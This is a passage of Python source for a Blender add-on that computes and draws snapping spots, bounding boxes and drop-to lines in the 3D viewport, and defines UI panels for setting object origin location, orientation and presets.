mu.Vector((xd,yd,zd))\n\n\t\t\tbom = sps.get('zpv') if prdir == '1' else sps.get('znv')\n\n\t\t\tpsp = {'np':mu.Vector((xn,yp,z)),'cp':mu.Vector((xc,yp,z)),'pp':mu.Vector((xp,yp,z)),\n\t\t\t\t\t'nc':mu.Vector((xn,yc,z)),'cc':mu.Vector((xc,yc,z)),'pc':mu.Vector((xp,yc,z)),\n\t\t\t\t\t'nn':mu.Vector((xn,yn,z)),'cn':mu.Vector((xc,yn,z)),'pn':mu.Vector((xp,yn,z)),\n\t\t\t\t\t'dtp_a':dtp_a,'dtp_b':dtp_b,'dtp_c':dtp_c,'dtp_d':dtp_d,'dtp_e':dtp_e,\n\t\t\t\t\t'bom':bom,'boc':boc,'com':sps.get('com')}\n\n\t\taxis = {\n\t\t\t'xap':mu.Vector((1,0,0)),'xan':mu.Vector((-1,0,0)),\n\t\t\t'yap':mu.Vector((0,1,0)),'yan':mu.Vector((0,-1,0)),\n\t\t\t'zap':mu.Vector((0,0,1)),'zan':mu.Vector((0,0,-1))}\n\n\t\tbound = {\n\t\t\t'ba':mu.Vector((xp,yn,zp)),'bb':mu.Vector((xp,yp,zp)),'bc':mu.Vector((xp,yp,zn)),'bd':mu.Vector((xp,yn,zn)),\n\t\t\t'be':mu.Vector((xn,yn,zp)),'bf':mu.Vector((xn,yp,zp)),'bg':mu.Vector((xn,yp,zn)),'bh':mu.Vector((xn,yn,zn))}\n\n\t\tpsp = {**psp, **axis, **bound}\n\n\t\tif orm != mu.Matrix.Identity(3):\n\t\t\tfor k,v in psp.items(): psp[k] = orm @ v\n\n\t\tmatrix = {'orm':sps.get('orm')}\n\t\tpsp = {**psp, **matrix}\n\n\t\tspot_psp_data.append(psp)\n\ndef draw_this(shader,coordinates,colors,line_wifdth=1):\n\tbatch = batch_for_shader(shader, 'LINES', {\"pos\": coordinates, \"color\": colors})\n\tbgl.glLineWidth(line_wifdth)\n\tshader.bind()\n\tbatch.draw(shader)\n\tbgl.glLineWidth(1)\n\ndef color_lerp(ca,cb,n,t):\n\tif n == 0:\n\t\treturn mu.Vector(cb)\n\telse:\n\t\tfrac = (mu.Vector(cb) - mu.Vector(ca))/t\n\t\treturn mu.Vector(cb) - (frac*n) \n\ndef color_fade(color,n,t):\n\tn += 1\n\ta,b,c,d = color[0],color[1],color[2],color[3]\n\taf,bf,cf,df = (a/2)/t,(b/2)/t,(c/2)/t,(d/2)/t\n\treturn (a-(af*n),b-(bf*n),c-(cf*n),d-(df*n))\n\ndef draw_spots_main(self,context):\n\tbco = bpy.context\n\tsot = context.scene.sot_props\n\tbcv = bco.view_layer\n\taob = bco.active_object\n\tsob = bco.selected_objects\n\n\tglobal spot_mode_space_check\n\tglobal spot_projection_check\n\tglobal spot_sob_matrices_vdata\n\tglobal spot_orient_matrix\n\tglobal spot_sps_data\n\tglobal spot_psp_data\n\tglobal shapes\n\tglobal colors\n\n\tmode_or_space_recalc = False\n\tprojection_recalc = False\n\n\tmode_space = (sot.spot_set_mode,sot.spot_set_space)\n\tif spot_mode_space_check != mode_space:\n\t\tspot_mode_space_check = mode_space\n\t\tmode_or_space_recalc = True\n\n\tprojection_prms = (sot.spot_set_axis,sot.spot_set_dir,sot.drop_to_mode,sot.drop_to_smode,sot.drop_to_offset,sot.drop_custom_zero,sot.czp_x,sot.czp_y,sot.czp_z)\n\tif spot_projection_check != projection_prms:\n\t\tspot_projection_check = projection_prms\n\t\tprojection_recalc = True\n\n\tif sot.draw_spots_recalc or mode_or_space_recalc:\n\t\tmatrices_vdata_get(sot.spot_set_mode,aob,sob)\n\t\trotation_matrix_get(sot.spot_set_space,bco,sot,aob,sob)\n\t\tspots_calc(sot.spot_set_mode,sot.spot_set_space)\n\t\tprojection_recalc = True\n\n\tif projection_recalc:\n\t\tprojection_calc(sot.spot_set_axis,sot.spot_set_dir,sot.drop_to_mode,sot.drop_to_smode, \\\n\t\t\tsot.drop_to_offset,sot.drop_custom_zero,mu.Vector((sot.czp_x,sot.czp_y,sot.czp_z)))\n\n\tsot.draw_spots_recalc = False\n\n\n\ts3d = bco.space_data.region_3d\n\ta3d = bco.area.spaces.active.region_3d\n\tvmt = a3d.view_matrix.to_3x3()\n\tortho_view = True if s3d.view_perspective == 'ORTHO' else False\n\tif ortho_view: vivec = vmt.inverted() @ mu.Vector((0,0,1))\n\telse: vivec = vmt.inverted() @ (mu.Vector(a3d.view_matrix.col[3][:3]) * -1)\n\n\tgfv = []\n\tzpv = []\n\n\tif sot.spot_set_axis == '1': axicol = 
[colors[4],colors[5],colors[6]]\n\telif sot.spot_set_axis == '2': axicol = [colors[5],colors[4],colors[6]]\n\telse: axicol = [colors[6],colors[4],colors[5]]\n\n\tcsd = {'np':(axicol[2],2.2,shapes[3]), 'cp':(colors[0],1,shapes[2]), 'pp':(colors[0],1,shapes[2]),\n\t\t 'nc':(axicol[2],2.2,shapes[1]), 'cc':(colors[0],1,shapes[2]), 'pc':(colors[0],1,shapes[2]),\n\t\t 'nn':(axicol[0],2.2,shapes[1]), 'cn':(axicol[1],2.2,shapes[1]), 'pn':(axicol[1],2.2,shapes[1]),\n\t\t 'bom':(colors[1],2,shapes[2]), 'boc':(colors[2],3.5,shapes[2]), 'com':(colors[3],2.7,shapes[2]),\n\t\t'dtp_b':(colors[9],2,shapes[0])}\n\n\n\tshader = gpu.shader.from_builtin('3D_SMOOTH_COLOR')\n\tspot_psp_data = sorted(spot_psp_data, key=lambda e: (vmt @ e.get('boc'))[2])\n\n\tfor prd in spot_psp_data:\n\n\t\tif sot.draw_opt_bndc:\n\n\t\t\tba,bb,bc,bd,be,bf,bg,bh = prd.get('ba'),prd.get('bb'),prd.get('bc'),prd.get('bd'),prd.get('be'),prd.get('bf'),prd.get('bg'),prd.get('bh')\n\t\t\txap,xan,yap,yan,zap,zan = prd.get('xap').freeze(),prd.get('xan').freeze(),prd.get('yap').freeze(),prd.get('yan').freeze(),prd.get('zap').freeze(),prd.get('zan').freeze()\n\n\t\t\tbound = {\n\t\t\txap:[ba,bb,bb,bc,bc,bd,bd,ba],xan:[be,bf,bf,bg,bg,bh,bh,be],\n\t\t\tyap:[bf,bb,bb,bc,bc,bg,bg,bf],yan:[be,ba,ba,bd,bd,bh,bh,be],\n\t\t\tzap:[bf,bb,bb,ba,ba,be,be,bf],zan:[bg,bc,bc,bd,bd,bh,bh,bg]}\n\n\t\t\tbound_rrd, bback_crd, bback_col, bfront_crd, bfront_col = [],[],[],[],[]\n\n\t\t\tfor avec,coords in bound.items():\n\t\t\t\tif (ortho_view and avec.dot(vivec) <= 0) or ( not ortho_view and avec.dot(vivec - prd.get('boc')) <= 0):\n\t\t\t\t\tfor crd in coords:\n\t\t\t\t\t\tbback_crd.append(crd)\n\t\t\t\t\t\tbback_col.append(colors[8])\n\t\t\t\t\t\tbound_rrd.append(avec)\n\n\t\t\tfor avec,coords in bound.items():\n\t\t\t\tif not avec in bound_rrd:\n\t\t\t\t\tfor crd in coords:\n\t\t\t\t\t\tbfront_crd.append(crd)\n\t\t\t\t\t\tbfront_col.append(colors[7])\n\n\t\t\tdraw_this(shader,bback_crd,bback_col,2)\n\t\t\tdraw_this(shader,bfront_crd,bfront_col,3)\n\n\t\tif sot.draw_opt_dtpl:\n\t\t\n\t\t\tdrop_crd = [\n\t\t\t\tprd.get('dtp_a'),prd.get('dtp_b'),\n\t\t\t\tprd.get('dtp_b'),prd.get('dtp_c'),\n\t\t\t\tprd.get('dtp_c'),prd.get('dtp_d'),\n\t\t\t\tprd.get('dtp_d'),prd.get('dtp_e')] \\\n\t\t\t\tif sot.drop_to_mode == '1' else [\n\t\t\t\tprd.get('dtp_a'),prd.get('dtp_b')]\n\n\t\t\tdrop_col = [\n\t\t\t\tcolors[10],colors[10],\n\t\t\t\tcolors[11],colors[11],\n\t\t\t\tcolors[11],colors[11],\n\t\t\t\tcolors[11],colors[11],]\t\\\n\t\t\t\tif sot.drop_to_mode == '1' else [\t\t\n\t\t\t\tcolors[10],colors[10]]\n\n\t\t\tdraw_this(shader,drop_crd,drop_col,2)\n\n\t\t\tzero_crd,zero_col = [],[]\n\t\t\tscl = screen_size(bco,prd.get('dtp_e'),True) * csd.get('dtp_b')[1] * sot.draw_spots_scale\n\t\t\tfor val in shapes[4]:\n\t\t\t\t\tval = (vmt.inverted() @ (mu.Vector(val)*scl)) + prd.get('dtp_e')\t\n\t\t\t\t\tzero_crd.append(val)\n\t\t\t\t\tzero_col.append(csd.get('dtp_b')[0])\n\t\t\tdraw_this(shader,zero_crd,zero_col,6)\t\t\t\t\n\n\n\t\t\tif not sot.draw_opt_bnds:\n\t\t\t\tdtp_crd, dtp_col = [],[]\n\t\t\t\tscl = screen_size(bco,prd.get('dtp_b'),True) * csd.get('dtp_b')[1] * sot.draw_spots_scale\n\t\t\t\tfor val in csd.get('dtp_b')[2]:\n\t\t\t\t\tval = (vmt.inverted() @ (mu.Vector(val)*scl)) + prd.get('dtp_b')\t\n\t\t\t\t\tdtp_crd.append(val)\n\t\t\t\t\tdtp_col.append(csd.get('dtp_b')[0])\n\t\t\t\tdraw_this(shader,dtp_crd,dtp_col,6)\n\n\n\t\tif sot.draw_opt_bnds:\n\n\t\t\tspots = 
[('np',prd.get('np')),('cp',prd.get('cp')),('pp',prd.get('pp')),\n\t\t\t\t\t('nc',prd.get('nc')),('cc',prd.get('cc')),('pc',prd.get('pc')),\n\t\t\t\t\t('nn',prd.get('nn')),('cn',prd.get('cn')),('pn',prd.get('pn')),\t\n\t\t\t\t\t('bom',prd.get('bom')),('boc',prd.get('boc')),('com',prd.get('com')),('dtp_b',prd.get('dtp_b'))]\n\n\t\t\tspots = sorted(spots, key=lambda e: (vmt @ e[1])[2])\n\n\t\t\tspots_crd, spots_col = [],[]\n\t\t\tfor spt,coords in spots:\n\t\t\t\tif not sot.draw_opt_dtpl and spt == 'dtp_b':\n\t\t\t\t\tcontinue\n\t\t\t\tscl = screen_size(bco,coords,True) * csd.get(spt)[1] * sot.draw_spots_scale\n\t\t\t\tfor val in csd.get(spt)[2]:\n\t\t\t\t\tval = (vmt.inverted() @ (mu.Vector(val)*scl)) + coords\t\n\t\t\t\t\tspots_crd.append(val)\n\t\t\t\t\tspots_col.append(csd.get(spt)[0])\n\n\t\t\tdraw_this(shader,spots_crd,spots_col,6)\n\treturn\n\ndef enum_updateloc_rot_presets(self, context):\n\tsot = context.scene.sot_props\n\n\tpr_enum = []\n\tpr_num = len(pr_values)\n\tfor k,v in pr_values.items():\n\t\tn = len(pr_enum)\n\t\tnew_pr = (k, k, 'Location = ' + str(v[0]) + ' | Orientation = ' \n\t\t\t+ str((round(math.degrees(v[1][0]),4),round(math.degrees(v[1][1]),4),round(math.degrees(v[1][2]),4))), n)\n\t\tpr_enum.append(new_pr)\n\treturn pr_enum\n\ndef prop_update_draw_loc_rot_axis(self, context):\n\tif context.scene.sot_props.draw_loc_rot_axis:\n\t\tbpy.ops.fgt.sot_draw_loc_rot_axis('INVOKE_DEFAULT')\n\treturn\n\ndef prop_update_draw_loc_rot_presets(self, context):\n\tif context.scene.sot_props.draw_loc_rot_presets:\n\t\tbpy.ops.fgt.sot_draw_loc_rot_presets('INVOKE_DEFAULT')\n\treturn\n\ndef prop_update_loc_mode(self, context):\n\tsot = context.scene.sot_props\n\tglobal loc_mode_current\t\n\n\tif loc_mode_current != sot.loc_mode:\n\t\tloc_mode_current = sot.loc_mode\n\t\tif sot.loc_mode == '2':\n\t\t\tbpy.ops.fgt.sot_convert_local('EXEC_DEFAULT')\n\treturn\n\ndef prop_update_loc_ltr(self, context):\n\tsot = context.scene.sot_props\n\n\tbpy.ops.fgt.sot_convert_from_local('EXEC_DEFAULT')\n\treturn\n\ndef prop_update_rot(self, context):\n\tsot = context.scene.sot_props\n\tglobal rot_update\n\n\tif sot.loc_mode == '2':\n\t\trot_update = 3\n\t\tbpy.ops.fgt.sot_convert_local('EXEC_DEFAULT')\n\treturn\n\ndef prop_update_spot_set_pick(self, context):\n\tsot = context.scene.sot_props\n\tif sot.spot_set_pick == '2' and (sot.spot_set_mode == '3' or sot.spot_set_mode == '4'):\n\t\tif sot.spot_set_mode == '4': sot.spot_set_mode = '2'\n\t\telif sot.spot_set_mode == '3': sot.spot_set_mode = '1'\n\treturn\n\ndef prop_update_draw_spots(self, context):\n\tsot = context.scene.sot_props\n\tif sot.draw_spots:\n\t\tsot.draw_spots_recalc = True\n\t\tbpy.ops.fgt.sot_draw_spots('INVOKE_DEFAULT')\n\treturn\n\ndef prop_update_draw_spots_recalc(self,context):\n\tsot = context.scene.sot_props\n\tif not sot.draw_spots and sot.draw_spots_recalc:\n\t\tsot.draw_spots_recalc = False\n\treturn\n\ndef spt_prms(sot,spt_name,drop = False):\n\tif drop: return sot.spot_set_mode, sot.spot_set_not_active, sot.spot_set_axis, sot.spot_set_dir, sot.spot_set_space, spt_name, \\\n\t\tsot.drop_to_mode, sot.drop_to_smode, sot.drop_to_offset, sot.drop_custom_zero, mu.Vector((sot.czp_x,sot.czp_y,sot.czp_z))\n\telse: return sot.spot_set_mode, sot.spot_set_not_active, sot.spot_set_axis, sot.spot_set_dir, sot.spot_set_space, spt_name\n\n\n\n\n# UI PANEL -------------------------------------------------------------------------------------\n\n\n\n\n\nclass SOT_PT_Panel(bpy.types.Panel):\n\tbl_label = 'SOT'\n\tbl_idname = 
'SOT_PT_Panel'\n\tbl_space_type = 'VIEW_3D'\n\tbl_region_type = 'UI'\n\tbl_category = 'FGT'\n\n\tdef draw(self, context):\n\t\tlayout = self.layout\n\nclass SOT_PT_Location_Orientation(bpy.types.Panel):\n\tbl_label = 'Location & Orientation'\n\tbl_idname = 'SOT_PT_Location_Orientation'\n\tbl_space_type = 'VIEW_3D'\n\tbl_region_type = 'UI'\n\tbl_category = 'FGT'\n\tbl_parent_id = 'SOT_PT_Panel'\n\tbl_options = {'DEFAULT_CLOSED'}\n\n\tdef draw(self, context):\n\t\tsot = context.scene.sot_props\n\t\tsts = context.scene.tool_settings\n\t\tget = 'fgt.sot_get_transform'\n\n\t\tlayout = self.layout\n\t\tcol = layout.column(align=True)\n\n\t\tif context.mode == 'OBJECT':\n\t\t\tcol.prop(sts, 'use_transform_data_origin', icon= 'TRANSFORM_ORIGINS', text= 'Manual Origin Transform', toggle= True)\n\t\tcol.separator(factor=1)\n\n\t\trow = col.row(align=True)\n\t\trow.operator(get, icon='PIVOT_CURSOR', text='Get Cursor')\t\t\t\t\t\t\t.prm_get_transform = 'lr_c'\n\t\trow.operator(get, icon='ORIENTATION_LOCAL', text='Get Active')\t\t\t\t\t\t.prm_get_transform = 'lr_a'\n\n\t\trow = col.row(align=True)\n\t\trow.label(text= 'Set Origin:')\n\t\tif pr_values != {}: row.prop(sot, 'loc_rot_from_preset', text= 'From Preset', icon='PASTEFLIPDOWN', toggle= True)\n\n\t\tprval = True if sot.loc_rot_from_preset and pr_values != {} else False\n\n\t\trow = col.row(align=True)\n\t\tset_loc = row.operator('fgt.sot_set_origin_loc_rot', icon='ORIENTATION_GLOBAL', text='Location')\n\t\tset_loc.prm_set_loc_rot = 'Loc'\n\t\tset_loc.prm_set_act_bat = sot.loc_rot_active_batch\n\t\tset_loc.prm_set_location = pr_values.get(sot.loc_rot_presets)[0] if prval else mu.Vector((sot.loc_x,sot.loc_y,sot.loc_z))\n\t\tset_loc.prm_set_rotation = pr_values.get(sot.loc_rot_presets)[1] if prval else mu.Vector((sot.rot_x,sot.rot_y,sot.rot_z))\n\t\tset_rot = row.operator('fgt.sot_set_origin_loc_rot', icon='ORIENTATION_GIMBAL', text='Orientation')\n\t\tset_rot.prm_set_loc_rot = 'Rot'\n\t\tset_rot.prm_set_act_bat = sot.loc_rot_active_batch\n\t\tset_rot.prm_set_location = pr_values.get(sot.loc_rot_presets)[0] if prval else mu.Vector((sot.loc_x,sot.loc_y,sot.loc_z))\n\t\tset_rot.prm_set_rotation = pr_values.get(sot.loc_rot_presets)[1] if prval else mu.Vector((sot.rot_x,sot.rot_y,sot.rot_z))\n\n\t\tset_both = col.operator('fgt.sot_set_origin_loc_rot', icon='ORIENTATION_LOCAL', text='Location + Orientation')\n\t\tset_both.prm_set_loc_rot = 'Loc + Rot'\n\t\tset_both.prm_set_act_bat = sot.loc_rot_active_batch\n\t\tset_both.prm_set_location = pr_values.get(sot.loc_rot_presets)[0] if prval else mu.Vector((sot.loc_x,sot.loc_y,sot.loc_z))\n\t\tset_both.prm_set_rotation = pr_values.get(sot.loc_rot_presets)[1] if prval else mu.Vector((sot.rot_x,sot.rot_y,sot.rot_z))\n\t\tcol.separator(factor=1)\n\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'loc_rot_active_batch', icon= 'DOT', value= '1')\n\t\trow.prop_enum(sot, 'loc_rot_active_batch', icon= 'LIGHTPROBE_GRID', value= '2')\n\t\trow = col.row(align=True)\n\t\trow.prop(sot, 'draw_loc_rot_axis', text= 'Hide Helper Axis' if sot.draw_loc_rot_axis else 'Show Helper Axis', icon='EMPTY_AXIS', toggle= True)\n\n\nclass SOT_PT_Location(bpy.types.Panel):\n\tbl_label = 'Location'\n\tbl_idname = 'SOT_PT_Location'\n\tbl_space_type = 'VIEW_3D'\n\tbl_region_type = 'UI'\n\tbl_category = 'FGT'\n\tbl_parent_id = 'SOT_PT_Location_Orientation'\n\tbl_options = {'DEFAULT_CLOSED'}\n\n\tdef draw(self, context):\n\t\tsot = context.scene.sot_props\n\t\tclear = 'fgt.sot_clear_value'\n\t\tget = 'fgt.sot_get_transform'\n\n\t\tlayout 
= self.layout\n\t\tcol = layout.column(align=True)\n\n\t\trow = col.row(align=True)\n\t\tset_loc = row.operator('fgt.sot_set_origin_loc_rot', icon='ORIENTATION_GLOBAL', text='Set Origin Location')\n\t\tset_loc.prm_set_loc_rot = 'Loc'\n\t\tset_loc.prm_set_act_bat = sot.loc_rot_active_batch\n\t\tset_loc.prm_set_location = mu.Vector((sot.loc_x,sot.loc_y,sot.loc_z))\n\t\tcol.separator(factor=1)\n\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'loc_mode', icon= 'ORIENTATION_GLOBAL' ,value= '1')\n\t\trow.prop_enum(sot, 'loc_mode', icon= 'ORIENTATION_LOCAL' ,value= '2')\n\n\t\tif sot.loc_mode == '1':\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'loc_x', text= 'X')\n\t\t\trow.operator(clear, icon='X' if sot.loc_x != 0 else 'DOT', text='')\t\t\t\t.cop = 'loc_x'\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'loc_y', text= 'Y')\n\t\t\trow.operator(clear, icon='X' if sot.loc_y != 0 else 'DOT', text='')\t\t\t\t.cop = 'loc_y'\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'loc_z', text= 'Z')\n\t\t\trow.operator(clear, icon='X' if sot.loc_z != 0 else 'DOT', text='')\t\t\t\t.cop = 'loc_z'\t\n\t\telse:\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'loc_x_ltr', text= 'X')\n\t\t\trow.operator(clear, icon='X' if sot.loc_x_ltr != 0 else 'DOT', text='')\t\t\t.cop = 'loc_x_ltr'\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'loc_y_ltr', text= 'Y')\n\t\t\trow.operator(clear, icon='X' if sot.loc_y_ltr != 0 else 'DOT', text='')\t\t\t.cop = 'loc_y_ltr'\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'loc_z_ltr', text= 'Z')\n\t\t\trow.operator(clear, icon='X' if sot.loc_z_ltr != 0 else 'DOT', text='')\t\t\t.cop = 'loc_z_ltr'\n\n\t\trow = col.row(align=True)\n\t\trow.operator(get, icon='PIVOT_CURSOR', text='Get Cursor')\t\t\t\t\t\t\t.prm_get_transform = 'loc_c'\n\t\trow.operator(get, icon='PIVOT_ACTIVE', text='Get Active')\t\t\t\t\t\t\t.prm_get_transform = 'loc_a'\n\t\tnot_zero = True if sot.loc_x != 0 or sot.loc_y != 0 or sot.loc_z != 0 else False\n\t\tif sot.loc_mode == '1':\n\t\t\trow.operator(clear, icon='X' if not_zero else 'DOT', text='')\t\t\t\t\t.cop = 'multi loc_x loc_y loc_z'\n\t\telse:\n\t\t\trow.operator(clear, icon='X' if not_zero else 'DOT', text='')\t\t\t\t\t.cop = 'multi loc_x_ltr loc_y_ltr loc_z_ltr'\n\n\nclass SOT_PT_Orientation(bpy.types.Panel):\n\tbl_label = 'Orientation'\n\tbl_idname = 'SOT_PT_Orientation'\n\tbl_space_type = 'VIEW_3D'\n\tbl_region_type = 'UI'\n\tbl_category = 'FGT'\n\tbl_parent_id = 'SOT_PT_Location_Orientation'\n\tbl_options = {'DEFAULT_CLOSED'}\n\n\tdef draw(self, context):\n\t\tsot = context.scene.sot_props\n\t\trotate = 'fgt.sot_rotate_ninety'\n\t\tclear = 'fgt.sot_clear_value'\n\t\tget = 'fgt.sot_get_transform'\n\n\t\tzax_dic = {'z+':'rem_zp','z-':'rem_zn','y+':'rem_yp','y-':'rem_yn','x+':'rem_xp','x-':'rem_xn'}\n\t\trem_dic = {'z+':sot.rem_zp,'z-':sot.rem_zn,'y+':sot.rem_yp,'y-':sot.rem_yn,'x+':sot.rem_xp,'x-':sot.rem_xn}\n\n\t\tlayout = self.layout\n\t\tcol = layout.column(align=True)\n\n\t\trow = col.row(align=True)\n\t\tset_rot = row.operator('fgt.sot_set_origin_loc_rot', icon='ORIENTATION_GIMBAL', text='Set Origin Orientation')\n\t\tset_rot.prm_set_loc_rot = 'Rot'\n\t\tset_rot.prm_set_act_bat = sot.loc_rot_active_batch\n\t\tset_rot.prm_set_rotation = mu.Vector((sot.rot_x,sot.rot_y,sot.rot_z))\n\t\tcol.separator(factor=1)\n\n\t\trow = col.row(align=True)\n\t\trow.operator(rotate, icon='LOOP_FORWARDS', text='')\t\t\t\t\t\t\t\t\t.rop = '-rot_x'\n\t\trow.operator(rotate, icon='LOOP_BACK', text='')\t\t\t\t\t\t\t\t\t.rop = 
'+rot_x'\n\t\trow.prop(sot, 'rot_x', text= 'X')\n\t\trow.operator(clear, icon='X' if sot.rot_x != 0 else 'DOT', text='')\t\t\t\t\t.cop = 'rot_x'\n\t\trow = col.row(align=True)\n\t\trow.operator(rotate, icon='LOOP_FORWARDS', text='')\t\t\t\t\t\t\t\t\t.rop = '-rot_y'\n\t\trow.operator(rotate, icon='LOOP_BACK', text='')\t\t\t\t\t\t\t\t\t.rop = '+rot_y'\n\t\trow.prop(sot, 'rot_y', text= 'Y')\n\t\trow.operator(clear, icon='X' if sot.rot_y != 0 else 'DOT', text='')\t\t\t\t\t.cop = 'rot_y'\n\t\trow = col.row(align=True)\n\t\trow.operator(rotate, icon='LOOP_FORWARDS', text='')\t\t\t\t\t\t\t\t\t.rop = '-rot_z'\n\t\trow.operator(rotate, icon='LOOP_BACK', text='')\t\t\t\t\t\t\t\t\t.rop = '+rot_z'\n\t\trow.prop(sot, 'rot_z', text= 'Z')\n\t\trow.operator(clear, icon='X' if sot.rot_z != 0 else 'DOT', text='')\t\t\t\t\t.cop = 'rot_z'\n\n\t\trow = col.row(align=True)\n\t\trow.operator(get, icon='PIVOT_CURSOR', text='Get Cursor')\t\t\t\t\t\t\t.prm_get_transform = 'rot_c'\n\t\trow.operator(get, icon='PIVOT_ACTIVE', text='Get Active')\t\t\t\t\t\t\t.prm_get_transform = 'rot_a'\n\t\tnot_zero = True if sot.rot_x != 0 or sot.rot_y != 0 or sot.rot_z != 0 else False\n\t\trow.operator(clear, icon='X' if not_zero else 'DOT', text='')\t\t\t\t\t\t.cop = 'multi rot_x rot_y rot_z'\n\n\t\trow = col.row(align=True)\n\t\tif sot.z_rem:\n\n\t\t\t#row.label(text= 'Z+ remap to:')\n\t\t\trow.prop(sot, 'z_rem', text= 'Z+ remap to:', toggle= True)\n\t\t\trow.prop(sot, 'z_axis', text= '')\n\t\t\trow.operator(clear, icon='X' if sot.z_axis != 'z+' else 'DOT', text='')\t\t\t\t.cop = 'z_axis'\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, zax_dic.get(sot.z_axis), text= '')\n\t\t\trow.operator(clear, icon='X' if rem_dic.get(sot.z_axis) != '1' else 'DOT', text='').cop = zax_dic.get(sot.z_axis)\n\t\telse:\n\t\t\trow.prop(sot, 'z_rem', text= 'Remap Z+ axis', toggle= True)\n\n\n\n\nclass SOT_PT_Presets(bpy.types.Panel):\n\tbl_label = 'Presets'\n\tbl_idname = 'SOT_PT_Presets'\n\tbl_space_type = 'VIEW_3D'\n\tbl_region_type = 'UI'\n\tbl_category = 'FGT'\n\tbl_parent_id = 'SOT_PT_Panel'\n\tbl_options = {'DEFAULT_CLOSED'}\n\n\tdef draw(self, context):\n\t\tsot = context.scene.sot_props\n\t\tlayout = self.layout\n\t\tcol = layout.column(align=True)\n\n\t\trow = col.row(align=True)\n\t\trow.operator('fgt.sot_preset_add', text='Loc/Rot', icon='IMPORT')\n\t\trow.operator('fgt.sot_preset_add_cursor', text='Cursor', icon='PIVOT_CURSOR')\n\t\trow.operator('fgt.sot_preset_add_active', text='Active', icon='PIVOT_ACTIVE')\n\n\t\tif pr_values != {}:\n\n\n\t\t\trow = col.row(align=True)\n\t\t\trow.operator('fgt.sot_preset_get', text='Loc/Rot', icon='EXPORT')\t\t\t\t\t\t\t.prm_preset_get = 'both'\n\t\t\trow.operator('fgt.sot_preset_get', text='Loc', icon='EXPORT')\t\t\t\t\t\t.prm_preset_get = 'loc'\n\t\t\trow.operator('fgt.sot_preset_get', text='Rot', icon='EXPORT')\t\t\t\t\t\t.prm_preset_get = 'rot'\n\t\t\tcol.separator(factor=1)\t\n\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'loc_rot_presets', text = '')\n\t\t\trow.operator('fgt.sot_preset_rem', text='', icon='X' if len(pr_values) != 0 else 'DOT')\n\n\t\t\trow = col.row(align=True)\n\t\t\trow.operator('fgt.sot_preset_ren', text='Rename', icon='EVENT_R')\n\t\t\trow.operator('fgt.sot_preset_rrd', text='Up', icon='TRIA_UP')\t\t\t\t\t\t\t.reorder_up = True\n\t\t\trow.operator('fgt.sot_preset_rrd', text='Down', icon='TRIA_DOWN')\t\t\t\t\t\t.reorder_up = False\t\n\t\t\tcol.prop(sot, 'draw_loc_rot_presets', text= 'Hide Preset Visuals' if sot.draw_loc_rot_presets else 'Show Preset Visuals', 
icon= 'GRID')\n\n\t\t\ti = sot.loc_rot_presets\n\t\t\tv = pr_values.get(i)\n\t\t\tcol.label(text= str(list(pr_values.keys()).index(i)+1) + '/' + str(len(pr_values)) + ' : ' + i)\n\t\t\tcol.label(text= 'Loc ( X ' + str(round(v[0][0],5)) + ' | Y ' + str(round(v[0][1],5)) + ' | Z ' + str(round(v[0][2],5)) + ' )' )\n\t\t\tcol.label(text= 'Rot ( X ' + str(round(math.degrees(v[1][0]),5)) + ' | Y ' + str(round(math.degrees(v[1][1]),5)) + ' | Z ' + str(round(math.degrees(v[1][2]),5)) + ' )' )\n\n\nclass SOT_PT_Fixed_Snap(bpy.types.Panel):\n\tbl_label = 'Fixed Spots Snap'\n\tbl_idname = 'SOT_PT_Fixed_Snap'\n\tbl_space_type = 'VIEW_3D'\n\tbl_region_type = 'UI'\n\tbl_category = 'FGT'\n\tbl_parent_id = 'SOT_PT_Panel'\n\tbl_options = {'DEFAULT_CLOSED'}\n\n\tdef draw(self, context):\n\t\tsot = context.scene.sot_props\n\t\tclear = 'fgt.sot_clear_value'\n\t\tget = 'fgt.sot_get_transform'\n\t\tset_pick_operator = 'fgt.sot_fixed_snap' if sot.spot_set_pick == '1' else 'fgt.sot_fixed_spot_pick'\n\t\tsmode = True if sot.spot_set_pick == '1' else False\n\n\t\tlayout = self.layout\n\t\tcol = layout.column(align=True)\n\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'spot_set_pick', icon='TRANSFORM_ORIGINS', value= '1')\n\t\trow.prop_enum(sot, 'spot_set_pick', icon='EXPORT', value= '2')\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'spot_set_mode', icon='DOT', value= '1')\n\t\trow.prop_enum(sot, 'spot_set_mode', icon='STICKY_UVS_LOC', value= '2')\n\t\tif sot.spot_set_pick == '1':\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop_enum(sot, 'spot_set_mode', icon='PARTICLE_DATA', value= '3')\n\t\t\trow.prop_enum(sot, 'spot_set_mode', icon='STICKY_UVS_DISABLE', value= '4')\n\t\t\tif sot.spot_set_mode == '3' or sot.spot_set_mode == '4':\n\t\t\t\t row = col.row(align=True)\n\t\t\t\t row.prop(sot, 'spot_set_not_active', text= 'Exclude Active', icon= 'CANCEL', toggle= True)\t\n\t\tcol.separator(factor=1)\n\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'spot_set_axis', value= '1')\n\t\trow.prop_enum(sot, 'spot_set_axis', value= '2')\n\t\trow.prop_enum(sot, 'spot_set_axis', value= '3')\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'spot_set_dir', icon='ADD', value= '1')\n\t\trow.prop_enum(sot, 'spot_set_dir', icon='REMOVE', value= '2')\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'spot_set_space', icon='ORIENTATION_GLOBAL', value= '1')\n\t\trow.prop_enum(sot, 'spot_set_space', icon='ORIENTATION_LOCAL', value= '2')\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'spot_set_space', icon='ORIENTATION_VIEW', value= '3')\n\t\trow.prop_enum(sot, 'spot_set_space', icon='ORIENTATION_CURSOR', value= '4')\n\n\t\tpreset_mat = 'From ' + 